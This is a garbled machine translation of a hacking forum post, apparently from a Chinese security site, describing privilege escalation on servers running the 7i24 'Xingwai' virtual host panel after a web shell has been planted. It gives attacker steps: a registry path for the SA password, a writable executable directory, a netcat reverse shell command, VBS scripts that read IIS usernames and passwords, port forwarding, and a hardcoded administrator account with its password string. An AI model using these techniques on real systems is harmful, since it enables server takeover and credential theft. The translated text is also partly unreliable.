Methods for Elevation of Privilege for out-of-star hosts

Recently, I talked about the method of multi-star out-of-stock elevation. Recently, I encountered a process of combining the station with some ideas of Daniel! The target is that the phishing site is very annoying, and it is safe without 0-day programs. We noticed that SHELL was obtained. Test support for ASPX scripts! After uploading a BIN, we can see other results without killing the ASPX Trojan. The target cannot be crossed, and the MYSQL and other directories cannot be skipped, CMD and other Elevation of Privilege tools are displayed blank during upload or prompt to have no permission! RegShell did not find much useful information when reading the Registry. According to the information, it is out of the stars.

It is easy for new users to get into trouble here!
On-site sa password registry location: HKEY_LOCAL_MACHINE \ SYSTEM \ LIWEIWENSOFT \ INSTALLFREEADMIN \ 11 32-bit MD5 encryption. In many cases, MD5 cannot run. A high-end user finds a writable Executable Directory C: \ Documents and Settings \ All Users \ Application Data \ Microsoft \ Media Index \ cmd.exe you can run some simple commands here, such as set, systeminfo, ipconfig, ping, and so on ~ You can use these commands to receive more system information.
If you are lucky enough to manage your configuration improperly, you can still use DIR C.D. E and other disks. A long time ago, small K (khjl1) sent me a for command to use it, the for command has a lower permission than the dir command. You can try it if the dir command is not available.
For/r d: \ freehost \ % I in (test) do @ echo % I> C: \ path \ 1.txt put d: \ freehost \ All Files written into 1.txt when using VBS to read the IIS Password, Many mentioned the NC rebound. In fact, the NC cannot rebound in many cases, and the firewall is blocked. the success rate is very low. If you fail and have to continue NC, you can try this brother. Maybe you can test it in this way. Reverse shell:
"C: \ windows \ temp \ nc.exe-vv ip 999-e c: \ windows \ temp \ cmd.exe"
Generally, it will not succeed.
Directly enter c: \ windows \ temp \ nc.exe In the cmd path.
Command Input-vv ip 999-e c: \ windows \ temp \ cmd.exe
But it can be successful ..
* ***** I did not succeed ******

Systeminfo looked at the management and completed the patch. We can use VBS to raise the right to test iis. you do not need to upload vbs to the WEB and directory without uploading them to the Media Index DIRECTORY. However, you must upload the elevation of permission tool to the Media Index before you can perform the operation ~ C: \ Documents and Settings \ has spaces, so you must use "", for example:
Export path:
C: \ Documents ents and Settings \ All Users \ Application Data \ Microsoft \ Media Index \ cmd.exe
Argument:
/C "c: \ Documents ents and Settings \ All Users \ Application Data \ Microsoft \ Media Index \ cscript.exe" d: \ freehost \ web \ 1.vbs
If this parameter is not included, a message indicating failure is displayed. Therefore, the Details determine success or failure!

Iis. vbs lists all domain names and paths, including our target sites, try to use the TYPE command to configure the target data (you can read some MSSQL or mysql web configuration under Elevation of Privilege, etc ~~~ Information is convenient for permission escalation) I am here only for the target, here the library is ACCESS, combined with several VBS in hand to read IIS users and passwords read the password 21 port can be connected to receive work!

Some people often ask me to avoid killing LCX. In fact, if ASPX is supported, there is a PortMap function on it. Many people do not pay attention to it. This is similar to LCX for forwarding, LCX is not included in the support for ASPX. it is easy to sort out the above based on other people's and their own experience, so it is convenient for some new users to learn. If there are any deficiencies, please remind me.

Supplement: www.2cto.com

The out-of-the-star virtual machine has always been regarded as BT. In fact, I feel that it is still very good. At least it supports aspx. If you find some execution directories, you can kill them by 99% seconds and take the server permissions.
The latest version of the executable directory C: \ Documents ents and Settings \ All Users \ Application Data \ Microsoft \ Media Index \ contains the directory C: \ PHP \ PEAR. C: \ PHP \ PEAR in, I also found that many virtual machines can be written and executed, but not many of them are found now. C: \ Documents ents and Settings \ All Users \ Application Data \ Microsoft \ Media Index \ This directory forum has been mentioned many times, and the pesticide articles last night have been quite clear.

The biggest off-star BUG is that FTP comes with the system, which can be listed by listing IIS configuration information. (Upload cscript.exe and modified adsutil. vbs)

7i24 virtual host management platform controlled end freehostrunat fa41328538d7be36e83ae91a78a1b16f! 7
Freehostrunat is created during off-star installation and belongs to the administrators user group. It is estimated that some people still do not understand this user fa41328538d7be36e83ae91a78a1b16f! 7. What is the encryption method. I used to be so stupid. I also ran to the external registry, configuration files, and so on, and finally did not decrypt it. Later I thought about it. His verification process could not be encrypted, because the FTP that comes with windows would not recognize the ciphertext, and other websites would be in plain text, so I just need to log on directly.